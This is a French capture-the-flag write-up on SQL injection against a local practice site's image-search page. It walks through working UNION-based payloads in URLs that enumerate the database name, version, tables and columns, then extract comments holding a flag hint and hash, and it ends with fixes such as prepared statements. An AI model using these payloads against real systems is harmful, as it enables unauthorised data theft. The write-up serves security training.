explication :

Voici l’URL de base quand on recherche une image :

http://localhost:8080/?page=searchimg&id=5&Submit=Submit#

----------------------------------------------------------------------------------------------------

Le premier test pour vérifier si on peut faire une injection SQL est d’ajouter du code
SQL pour vérifier si on peut injecter du code. On ajoute alors cette condition
"OR 1=1", qui est une condition qui est toujours vraie et qui va nous permettre d’afficher
toutes les images stockées.
Voici à quoi ressemble la requête SQL :

SELECT id, first_name, last_name FROM users WHERE id = '5 OR 1=1';

URL : http://localhost:8080/?page=searchimg&id=5 or 1=1&Submit=Submit#

----------------------------------------------------------------------------------------------------

Maintenant qu’on a vu que le site est sensible aux injections SQL, il nous faut trouver
la "forme" du tableau et le nombre de colonnes qu’il contient. Il faut voir ça comme un tableau
Excel. On va faire des tests pour trouver le nombre de colonnes ; pour ça, nous allons utiliser
UNION SELECT 'param'. UNION SELECT nous permet en temps normal de fusionner deux tableaux. La
seule condition pour que ça fonctionne, c’est que le tableau fasse la même taille. On va donc
remplacer 'param' par le nombre de colonnes : on commence à 1, puis 1,2, et ainsi de suite.
Dans notre cas, on s’aperçoit que notre DB a deux colonnes.

URL : http://localhost:8080/?page=searchimg&id=5 UNION SELECT 1,2 -- &Submit=Submit#

----------------------------------------------------------------------------------------------------

Maintenant qu’on a le nombre de colonnes, on va essayer de trouver le nom de la DB. Pour ça, on va
encore utiliser notre UNION SELECT. On va donc remplacer la deuxième colonne par le nom de la DB
en utilisant la fonction database().

URL : http://localhost:8080/?page=searchimg&id=5 UNION SELECT 1,database()&Submit=Submit#

Et voici le nom de la DB : Member_images. De la même manière, on va récupérer la version
de la DB, qui est : 5.5.64-MariaDB-1ubuntu0.14.04.1

URL : http://localhost:8080/?page=searchimg&id=5 UNION SELECT 1,version()&Submit=Submit#

----------------------------------------------------------------------------------------------------

Sachant que la version est supérieure à 5.0, on peut utiliser des fonctions comme schema, qui vont
nous permettre de trouver le nom de chaque champ du tableau.

Avec cette URL, on trouve le nom de la table, qui est 'list_images' :
URL : http://localhost:8080/?page=searchimg&id=5 UNION ALL SELECT 1, group_concat(table_name) FROM Information_schema.tables WHERE table_schema=database()&Submit=Submit#

De la même manière, on va essayer de trouver le nom des colonnes, sauf qu’on encode en hexadécimal 'list_images'
car certaines chaînes de caractères peuvent casser les requêtes. C’est pour ça qu’on utilise : 0x6c6973745f696d61676573
à la place de 'list_images'

URL : http://localhost:8080/?page=searchimg&id=1 union all select 1,group_concat(column_name) from Information_schema.columns where table_name=0x6c6973745f696d61676573&Submit=Submit#
On trouve que le tableau list_images contient : id, url, title, comment

----------------------------------------------------------------------------------------------------

Il ne nous reste plus qu’à fouiller dans les différents champs, en utilisant cette URL :

URL : http://localhost:8080/?page=searchimg&id=5 union all select 1,group_concat(comment,0x0a) from list_images&Submit=Submit#
On trouve ce message dans la section commentaire :

ID: 5 union all select 1,group_concat(comment,0x0a) from list_images 
Title: An image about the NSA !
,There is a number..
,Google it !
,Earth!
,If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46

solution:

-utiliser des requêtes perparees, les valeurs sont envoyees separement de la requête
-ne jammais concatener directement dans la requête
-masquer les message d erreur sql
-utiliser un firewall